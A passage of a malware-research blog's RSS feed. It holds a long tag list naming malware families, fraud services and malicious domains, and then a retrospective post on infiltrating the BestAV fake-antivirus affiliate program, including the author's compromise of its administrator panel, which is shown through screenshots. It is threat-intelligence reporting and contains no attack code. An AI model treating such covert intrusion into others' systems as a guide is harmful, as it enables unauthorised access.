memory grabber</category><category>cc-grabbers admin panel bender edition</category><category>certificate of nationality</category><category>chargeback</category><category>cheapMiner</category><category>check</category><category>chk4me.com</category><category>click fraud</category><category>client</category><category>code source</category><category>coding</category><category>cold death</category><category>consuella.net</category><category>contractor</category><category>counterfeit</category><category>cp</category><category>cpalead</category><category>cpanel</category><category>cracked as usual</category><category>crime</category><category>crypto/hash/calc tools</category><category>cryptolib</category><category>cryptovirus</category><category>curse.pw</category><category>custom packer</category><category>cybercrime</category><category>dating</category><category>dd2.ru</category><category>diabetal.org</category><category>digitalbooksonlinenow.com</category><category>disapperance</category><category>dll</category><category>doktordick.com</category><category>don&#39;t order from RS Components Ltd</category><category>download</category><category>drama</category><category>dramascene</category><category>driver license</category><category>drizz</category><category>dumping rom</category><category>dumpslogs</category><category>easy</category><category>ekoparty Security Conference 6 - Challenge ESET 2010</category><category>emails</category><category>encoding</category><category>euro</category><category>euro notes</category><category>euros</category><category>explorerr.exe</category><category>fake administrative documents</category><category>fake defragmenter</category><category>fake drafrag</category><category>fake euro</category><category>fake french document</category><category>fake pharma</category><category>female-orgazm.com</category><category>file35820289892.exe</category><category>fileunblock gmail.com</category><category>findvirus.ru</category><category>flagcounter</category><category>flash_player</category><category>flat slim</category><category>forumscc</category><category>frmcp</category><category>fubar</category><category>gameboy</category><category>gangstaservice</category><category>gate</category><category>gay</category><category>gbot.exe</category><category>getdumps.com</category><category>gradebooksonline.com</category><category>greatbooksdownloads.com</category><category>hacking</category><category>hologram</category><category>holos</category><category>homicide</category><category>hotwatches.ru</category><category>how</category><category>how i carded myself</category><category>i&#39;m away</category><category>iBank</category><category>iBanking</category><category>iZER0x</category><category>identity cards</category><category>identity currency</category><category>identity theft</category><category>idiots</category><category>ieup.co.cc</category><category>iferrari.ru</category><category>infiltration</category><category>infraud</category><category>interrogation</category><category>ishygddt</category><category>java applet</category><category>javascript</category><category>js.php infection</category><category>kaspepsky.ru</category><category>kcaptcha</category><category>killer</category><category>killmbr</category><category>krebsonsecurity</category><category>lammer</category><category>leads</category><category>letter templates</category><category>libretyeserve.com</category><category>life</category><category>life &amp; shit</category><category>lithuana bank</category><category>loader</category><category>lock</category><category>logs</category><category>lulzsec.su</category><category>luoyunbin</category><category>luvservice.be</category><category>luxcash.ru</category><category>mail</category><category>mainpanel</category><category>malicious applet</category><category>malware affiliate</category><category>malware reversing</category><category>malware unpacking</category><category>malwares</category><category>malwox.biz</category><category>mapped size</category><category>merchant</category><category>micro camera</category><category>micro worm</category><category>mining pool</category><category>mmon</category><category>mmon.exe</category><category>models</category><category>money</category><category>moneypack</category><category>msr</category><category>multi-rogue</category><category>multi-scan.com</category><category>murder</category><category>my-sdesign.com</category><category>mybooksplace.com</category><category>netox.biz</category><category>ngrBot</category><category>no dependencies</category><category>obfuscated</category><category>obfuscation</category><category>octavian</category><category>offshore</category><category>organized crime</category><category>overdose</category><category>ownz</category><category>pUre</category><category>paper money</category><category>paperback</category><category>partner</category><category>passports</category><category>passprts</category><category>pawn-shop.cc</category><category>payement for fakeav</category><category>payments</category><category>pcap</category><category>phishing template</category><category>phishing templates</category><category>photoshop</category><category>pirate</category><category>plasma HTTP</category><category>poker</category><category>pornoblocker</category><category>pornorolik</category><category>pornozud</category><category>pos sniffer</category><category>ppc.su</category><category>premiumphones.ru</category><category>primitive RunPE</category><category>private</category><category>private_brute.exe</category><category>projectHook</category><category>proxies</category><category>pwned</category><category>pwning</category><category>r57</category><category>ransomblock</category><category>rdasrv</category><category>reVoLution</category><category>redirector</category><category>ree4</category><category>refund</category><category>regedit</category><category>replicaiphone.ru</category><category>reproductions</category><category>requirements specification</category><category>rescator</category><category>reseller</category><category>reverse</category><category>reversing</category><category>rip</category><category>root</category><category>round</category><category>round 2</category><category>ru-tabs.ru</category><category>rupoppers.com</category><category>russian locker</category><category>rutabletki.com</category><category>rx-partners.biz</category><category>sacem</category><category>safe-data.ru</category><category>saliter.exe</category><category>scan4you</category><category>scan4you.net</category><category>scrapper</category><category>security-center inbox.lt</category><category>security116</category><category>see ya in 2012</category><category>see ya in 2k12</category><category>seriousbiz.ru</category><category>sevantivir.com</category><category>sha1</category><category>sig</category><category>skims</category><category>so long</category><category>sp3cial1st</category><category>spam campaign</category><category>spam shop</category><category>spamb0x</category><category>spamb0x.com</category><category>spamers</category><category>spammer shop</category><category>spark</category><category>sparks</category><category>spy</category><category>sql</category><category>sqli</category><category>star-stat.com</category><category>steal</category><category>stickers</category><category>still lame</category><category>stubs</category><category>suicide</category><category>super-socks.com</category><category>supern0va</category><category>swf</category><category>teller machine</category><category>thebookssellers.com</category><category>thesoftwaresellers.com</category><category>tiberiy.pro</category><category>tonijuve10</category><category>tonijuve11</category><category>tonijuve28</category><category>toture</category><category>track1 generator</category><category>tracking cybercrime</category><category>triton</category><category>trizonta.ru</category><category>uTorrent</category><category>udp</category><category>udp flooder</category><category>ukr-tabs.ru</category><category>ukrtabletki.com</category><category>unpack</category><category>unpacked</category><category>unpacking</category><category>update</category><category>upx</category><category>useless</category><category>utility bill</category><category>v1.150.1</category><category>valentine</category><category>variablesmscheck.hispamediamarketing.com</category><category>variante</category><category>vendettas</category><category>vertudiamond.ru</category><category>video72.avi.exe</category><category>videograbber.dll</category><category>virtual skimmer</category><category>virussign(3).exe</category><category>vkpay inbox.ru</category><category>vksh0p</category><category>vmZeus</category><category>vmadumps</category><category>vnloader</category><category>vskimmer</category><category>we-deal.net</category><category>web crab</category><category>web.archive.org</category><category>weelsof</category><category>who view my profil</category><category>winAD</category><category>winlock targeting French people</category><category>winlocks</category><category>wire</category><category>wire transfer</category><category>wlnrar-auth5.net</category><category>wm</category><category>worm</category><category>wowmatrix.pw</category><category>wowmatrix.pw.pw</category><category>wtf</category><category>wtf seriously</category><category>xddd.66ghz.com</category><category>xfrzx</category><category>xm-91</category><category>xxx_video_32605.avi.exe</category><category>xxx_video_New4.exe</category><category>ya-snimu-ego</category><category>yambaclick.com</category><category>yambaprivate.com</category><category>yandex.ru</category><category>yourbookdownloads.com</category><category>youtube</category><category>yummba</category><category>zarkaa.info</category><category>zip-help.com</category><category>zipmonster.ru</category><category>Атмосу</category><category>Дроп</category><category>КОМПЬЮТЕР ЗАБЛОКИРОВАН</category><category>ЛОКЕР</category><category>Меркурий</category><category>Пантера</category><category>Система управления SmsPiratBot</category><category>Хендехох</category><category>винкор</category><category>зевс</category><category>зевсаподобного</category><category>инфа</category><category>пайзафекард</category><category>ским</category><category>укаш</category><category>カワイイセキュリティ</category><title>XyliBox</title><description>If you want to make enemies, try to change something.</description><link>https://www.xylibox.com/</link><managingEditor>noreply@blogger.com (Steven K)</managingEditor><generator>Blogger</generator><openSearch:totalResults>631</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-2448599809824740900</guid><pubDate>Sat, 13 Sep 2025 15:26:00 +0000</pubDate><atom:updated>2025-09-13T17:27:17.254+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AffPrime</category><category domain="http://www.blogger.com/atom/ns#">bestAV</category><category domain="http://www.blogger.com/atom/ns#">BestSoft</category><category domain="http://www.blogger.com/atom/ns#">Cookies Money</category><category domain="http://www.blogger.com/atom/ns#">exploit kit</category><category domain="http://www.blogger.com/atom/ns#">Farewell</category><category domain="http://www.blogger.com/atom/ns#">Hacked</category><category domain="http://www.blogger.com/atom/ns#">SoftBunker</category><category domain="http://www.blogger.com/atom/ns#">Vendigo</category><title>BestAV (Fake Antispyware affiliate) exposed</title><description>&lt;p&gt;Hello everyone, it&#39;s been a while.&lt;/p&gt;&lt;p&gt;One of the first affiliate systems I ever infiltrated was BestAV, back in 2011, the same year I started XyliBox.&lt;br /&gt;&lt;br /&gt;Over the years i infiltrated most of the major FakeAV affiliate programs and BestAV was the biggest player in this scene.&lt;br /&gt;It was also the one i kept coming back to, a bit like me vs darkode :)&lt;br /&gt;It became something of a coup de cœur for me, even if that term doesn’t quite translate outside of French.&lt;br /&gt;&lt;br /&gt;Eventually i watched it fall, not from law enforcement, but simply because more lucrative threats arrived like ransomware and cryptolockers, they kinda made fakeAVs irrelevant.&lt;br /&gt;Although BestAV launched a ransomware affiliate later and put lot of efforts into it, they didn&#39;t survive.&lt;br /&gt;&lt;br /&gt;I also never really gave this blog a proper farewell.&lt;br /&gt;Like most things from that era, it just… slowed down.&lt;br /&gt;There’s still a pile of never-published stories and drafts sitting in my backend; hacked panels, and half-finished notes, strange old artifacts from a time where everything was fast, broken, and fascinating.&lt;br /&gt;&lt;br /&gt;BestAV feels like the right way to close this circle.&lt;br /&gt;It was the beginning, the obsession, and the last of its kind.&lt;br /&gt;So this post is both a final deep dive and the official end of XyliBox.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;Before we dive in, a bit of context for those who weren’t there or just want to refresh their memory about BestAV.&lt;br /&gt;&lt;br /&gt;The first time I looked into a FakeAV affiliate and also the first time i heard of the BestAV program was in 2011, and it all started with a tweet that led to my first write-up: &lt;a href=&quot;https://www.xylibox.com/2011/06/tracking-cyber-crime-inside-fakeav.html&quot;&gt;Tracking Cyber Crime: Inside FakeAV (June 2011)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From there, i kept watching them from the shadows, sometimes giving them hints on the fact that i had still access to their system, just in case they were reading (and I was pretty sure they were): &lt;a href=&quot;https://www.xylibox.com/2011/07/personal-shield-pro.html&quot;&gt;Personal Shield Pro (July 2011)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I went back again into BestAV, where the real obsession began: &lt;a href=&quot;https://www.xylibox.com/2011/08/tracking-cyber-crime-bestav-and.html&quot;&gt;Tracking Cyber Crime: BestAV and BlackSoftware (August 2011)&lt;/a&gt;&amp;nbsp;&lt;br /&gt;&lt;br /&gt;In 2012, I even infiltrated an affiliate who was built based on BestAV backend: &lt;a href=&quot;https://www.xylibox.com/2012/02/star-statcom-reseller-bestavsoft2.html&quot;&gt;Star-stat.com Reseller (February 2012)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A bit later i also wrote a small guide on how to infiltrate affiliate programs, not just FakeAV anymore, but any affiliate system. Of course, I used BestAV as example:&amp;nbsp;&lt;a href=&quot;https://www.xylibox.com/2012/06/how-to-infiltrate-affiliate-programs.html&quot;&gt;How to Infiltrate Affiliate Programs (June 2012)&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;br /&gt;I stayed hidden in this affiliate for a long time, monitoring their activity, quietly collecting samples, and following their moves.&lt;br /&gt;Along the way, I teamed up with Siri, Kafeine, Antelox, and many other friends I met on the path, working together to excavate their exploit kits, samples, and test setups.&lt;br /&gt;We see them evolve, and even launching a &lt;a href=&quot;https://malware.dontneedcoffee.com/2013/05/the-missing-link-some-lights-on-urausy.html&quot;&gt;ransomware affiliate&lt;/a&gt;&amp;nbsp;(Urausy).&lt;br /&gt;Sometimes we pulled datas at scale, like in 2013 when we massively burnt their crypt system by dumping lustrami.com infrastructure on VXVault, this one was tied to BestAV.&lt;/p&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiomKib2IuaL8qYK0uqDNK2G3N8xDn_lCnFzr0dLtudYJdaLUd-hvXW1cnNajoACIXs-Pj8ibFOS3lBIisyBGYgCMCIXmkpI7s_TOVvD8PlJFGAFpbrMVOMw-njdYYEHqE2ni9TkZbv3I/s1600/03-08-2013+18-07-02.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;348&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiomKib2IuaL8qYK0uqDNK2G3N8xDn_lCnFzr0dLtudYJdaLUd-hvXW1cnNajoACIXs-Pj8ibFOS3lBIisyBGYgCMCIXmkpI7s_TOVvD8PlJFGAFpbrMVOMw-njdYYEHqE2ni9TkZbv3I/w400-h348/03-08-2013+18-07-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;And finally, we’re in 2014, the fall of fake antivirus had already begun.&lt;br /&gt;So what can we say about BestAV at this point?&lt;br /&gt;Their affiliate system was already in bad shape, plagued by frequent downtime and a clear loss of momentum.&lt;br /&gt;Keys players stopped working with them, we could feel the collapse coming.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3oYg4Ng66HDTFWqy5xQVlfoiFPimhTfcUADWtmKojpyDr-g3yRG8qOlfXQClQpSSGBYWBN9niAPjzRm6nl8ngcHK5k6FGisHnvd8CLrUYaRWKyvU9-KftLDfVxIf1dbC6Cnz5J3FVcM/s1600/09-04-2014+15-07-52.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3oYg4Ng66HDTFWqy5xQVlfoiFPimhTfcUADWtmKojpyDr-g3yRG8qOlfXQClQpSSGBYWBN9niAPjzRm6nl8ngcHK5k6FGisHnvd8CLrUYaRWKyvU9-KftLDfVxIf1dbC6Cnz5J3FVcM/s1600/09-04-2014+15-07-52.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;&lt;br /&gt;So instead of looking at it &quot;again&quot; from an affiliate level, let&#39;s switch perspective to the administrator side.&lt;br /&gt;It’s been over 10 years, so i guess i can finally say it: We pwned them!&lt;br /&gt;&lt;br /&gt;The intelligence was of course shared at that time with some agencies who were interested, mostly because of the key players involved in participating on BestAV.&lt;br /&gt;I never made that public on the blog the operation was too tight back in time to just drop a &quot;good day, you’re pwned!&quot; or similar like i used to do on my posts.&lt;br /&gt;Not due to the BestAV admins reading this blog, but because of all the affiliates being monitored in some way.&lt;br /&gt;&lt;br /&gt;So I hope you&#39;ll enjoy these screenshots it’s one last chance to document the inside operation before their ultimate take-down the same year.&lt;br /&gt;I think it&#39;s also the first time that a FakeAV affiliate program will be documented this way.&lt;br /&gt;&lt;br /&gt;Home:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0KCq0ZWPmk5Mq6kuk4p_oiht9H0-Kbi6-wrTb-rAou-AbbinWLMEBWuhxxty58FtndP_ynAgMxml4VJcwHF6Lh1PBNEbGmycEQWpA84i4jbM5xlgVplloQ0iL6cFqITqB0gp6P1jABfU/s1600/09-04-2014+13-42-15.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0KCq0ZWPmk5Mq6kuk4p_oiht9H0-Kbi6-wrTb-rAou-AbbinWLMEBWuhxxty58FtndP_ynAgMxml4VJcwHF6Lh1PBNEbGmycEQWpA84i4jbM5xlgVplloQ0iL6cFqITqB0gp6P1jABfU/w400-h277/09-04-2014+13-42-15.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit article:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-yxIBzcFwqkw2OqCLr4dPOaEg8Eok7v48AMUj4W6wJQgs7E5tcidaZxW5nmMobKE0tLFpT1rJ5y0rrv9KpFWoK-CvoUrYuB8dTGjK7iWeNSDqygJltMrjKS-t5OKNHNt4BsJElP3TwM/s1600/09-04-2014+13-43-03.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-yxIBzcFwqkw2OqCLr4dPOaEg8Eok7v48AMUj4W6wJQgs7E5tcidaZxW5nmMobKE0tLFpT1rJ5y0rrv9KpFWoK-CvoUrYuB8dTGjK7iWeNSDqygJltMrjKS-t5OKNHNt4BsJElP3TwM/w400-h277/09-04-2014+13-43-03.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistic Soft 1:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcxPyY3AJt0vwB7HkKyDjvo39MTy82y4UKEh2_xDsDkzf8UMjbCciNjBIvN62B7HXoSvXknxoghhnyvSKYrBGnlcyF-ZFWAkapFkEu_jkfP6-Gct-HiS2G-TptJR747R31ZLeSzu82czE/s1600/09-04-2014+13-45-23.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;316&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcxPyY3AJt0vwB7HkKyDjvo39MTy82y4UKEh2_xDsDkzf8UMjbCciNjBIvN62B7HXoSvXknxoghhnyvSKYrBGnlcyF-ZFWAkapFkEu_jkfP6-Gct-HiS2G-TptJR747R31ZLeSzu82czE/w400-h316/09-04-2014+13-45-23.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Soft 2:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaONDEH79s7H6vvpgI_O3HgunI_O86sO7SZ7nKAfCBkbb4kpnI71ZKZitNn9UmU72VVH93VYttIIVercUwmnGBaIyORS-dFAyrs8-HE2gbT-bzoRZKdohTfH1nDRZJz4Cs1alVSDPJ2hw/s1600/09-04-2014+13-47-10.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaONDEH79s7H6vvpgI_O3HgunI_O86sO7SZ7nKAfCBkbb4kpnI71ZKZitNn9UmU72VVH93VYttIIVercUwmnGBaIyORS-dFAyrs8-HE2gbT-bzoRZKdohTfH1nDRZJz4Cs1alVSDPJ2hw/s1600/09-04-2014+13-47-10.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Soft 3:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKu1LWelZb5fUbx41Fa-4HpB9jKluh61RzSNUdWFsO0k4l9MsfmgGwUldHhn0bK2ZVGDeXhzyV-nnpFpohKqcMFpBkpFVEZeMAYw4zPDXgc4GcWzq9ekUXuGxn7iDEGLG6jdQJe9B7REI/s1600/09-04-2014+13-47-41.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKu1LWelZb5fUbx41Fa-4HpB9jKluh61RzSNUdWFsO0k4l9MsfmgGwUldHhn0bK2ZVGDeXhzyV-nnpFpohKqcMFpBkpFVEZeMAYw4zPDXgc4GcWzq9ekUXuGxn7iDEGLG6jdQJe9B7REI/s1600/09-04-2014+13-47-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
News:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTYQZlCauImTrRCl19O8LO9es07EcRckFUkkH73sq4mceeRBevd3fY2HdNOsNso034_MXKtHG8EtIuvulVEFLOwQwKXtbtua5DDWwVfj6DgSY_RrV_Sa21wLAVJrTLeupFjmDByC5aSU/s1600/09-04-2014+13-48-40.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTYQZlCauImTrRCl19O8LO9es07EcRckFUkkH73sq4mceeRBevd3fY2HdNOsNso034_MXKtHG8EtIuvulVEFLOwQwKXtbtua5DDWwVfj6DgSY_RrV_Sa21wLAVJrTLeupFjmDByC5aSU/s1600/09-04-2014+13-48-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Agreements:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdy0pRNYLKynYAUI_WdeDPOTgavAqo4JmXrBYms8LCKsXRcqcZqZSuKwJyVVeOV9R1fSH69it2_GUgfasOJUBASTOnPyoWJyFB01WcFOmTrCTY4OfGCZ0bnWizTcagD6dI7lMoUCyGS94/s1600/09-04-2014+13-49-28.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;132&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdy0pRNYLKynYAUI_WdeDPOTgavAqo4JmXrBYms8LCKsXRcqcZqZSuKwJyVVeOV9R1fSH69it2_GUgfasOJUBASTOnPyoWJyFB01WcFOmTrCTY4OfGCZ0bnWizTcagD6dI7lMoUCyGS94/s1600/09-04-2014+13-49-28.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Users:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikYRvwi9TgVgLO6WPXJ5XH3c231zFj2hB5JyOf8fV1fUIRux9h0LpWT8-_ReAZE1zM3fg5lVDqgvlGld3iO2q5RKcSL3kcdX2J-ni4X3qP3EDYq-F-xNVHDo9YkzDHw-plbOOUKy_Pe_o/s1600/09-04-2014+13-50-27.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;298&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikYRvwi9TgVgLO6WPXJ5XH3c231zFj2hB5JyOf8fV1fUIRux9h0LpWT8-_ReAZE1zM3fg5lVDqgvlGld3iO2q5RKcSL3kcdX2J-ni4X3qP3EDYq-F-xNVHDo9YkzDHw-plbOOUKy_Pe_o/w400-h298/09-04-2014+13-50-27.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Details for users:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqMu4pHw0kpyAugIvHkcWA4_6poi7N_HuMb85LpGAv2mvSy-sbcshosbg97KPQfliS4hV_HAWwLiZt6kmwYGYouWgpgEi6p2pjXXsp7OzAUIXFoMl0I39uDRiTd30Hcvv5jVN9gdiTm8/s1600/BestAV_users_1.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqMu4pHw0kpyAugIvHkcWA4_6poi7N_HuMb85LpGAv2mvSy-sbcshosbg97KPQfliS4hV_HAWwLiZt6kmwYGYouWgpgEi6p2pjXXsp7OzAUIXFoMl0I39uDRiTd30Hcvv5jVN9gdiTm8/s1600/BestAV_users_1.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGPuJEhBSKFYxMi8rvz2x2_jUY9r6yBXgIUrZPsOssuilWkf5sHKoVdfDEYleFHull0-V28El3U3BMPbshcE1pNz6ULU_e6NfNFoe2qtBWweE7iERtTsZtcA12oz1T45cdMxyO83EKPTI/s1600/BestAV_users_2.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGPuJEhBSKFYxMi8rvz2x2_jUY9r6yBXgIUrZPsOssuilWkf5sHKoVdfDEYleFHull0-V28El3U3BMPbshcE1pNz6ULU_e6NfNFoe2qtBWweE7iERtTsZtcA12oz1T45cdMxyO83EKPTI/s1600/BestAV_users_2.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNK3ld3IwhZEMkDjgA-s3qNBVhSrFjkwqpFfZhiBBu2Mw-fx3Vwdsn8lkAVBfTjVkhKRBAMZpYIvnzMASez8Mku5xn-Ul_nVPESGOLeKBJixz_bqmEGY1tkubaO9WqnplQTGNo6RpfpO8/s1600/BestAV_users_3.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNK3ld3IwhZEMkDjgA-s3qNBVhSrFjkwqpFfZhiBBu2Mw-fx3Vwdsn8lkAVBfTjVkhKRBAMZpYIvnzMASez8Mku5xn-Ul_nVPESGOLeKBJixz_bqmEGY1tkubaO9WqnplQTGNo6RpfpO8/s1600/BestAV_users_3.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQp0awXnyWoKNGVhkNi7fnun10J2EyGuVMa79uzkeRounp6ylthOd1PQwZVIgiCaSwUQ2MN1XZ8-X5sT4zfm8ms_r_tbdYxcD48IvYjSk91MtVunydxJeYUDLZbaMW2ifOjJxHh5qWo4/s1600/BestAV_users_4.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQp0awXnyWoKNGVhkNi7fnun10J2EyGuVMa79uzkeRounp6ylthOd1PQwZVIgiCaSwUQ2MN1XZ8-X5sT4zfm8ms_r_tbdYxcD48IvYjSk91MtVunydxJeYUDLZbaMW2ifOjJxHh5qWo4/s1600/BestAV_users_4.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qLBq2hPcdD3lrXApp-xr6ayET0d4Mx96CbQGQZdo_TN6_zEqD0QS3DADuVltbyj5E0ugFHea3IxoIlx7kyI2uVoF0mTfZs6txINH5MVH3lSECf-MNUTmzK-4S6kPMnN7r4PB2V7OWjQ/s1600/BestAV_users_5.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qLBq2hPcdD3lrXApp-xr6ayET0d4Mx96CbQGQZdo_TN6_zEqD0QS3DADuVltbyj5E0ugFHea3IxoIlx7kyI2uVoF0mTfZs6txINH5MVH3lSECf-MNUTmzK-4S6kPMnN7r4PB2V7OWjQ/s1600/BestAV_users_5.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
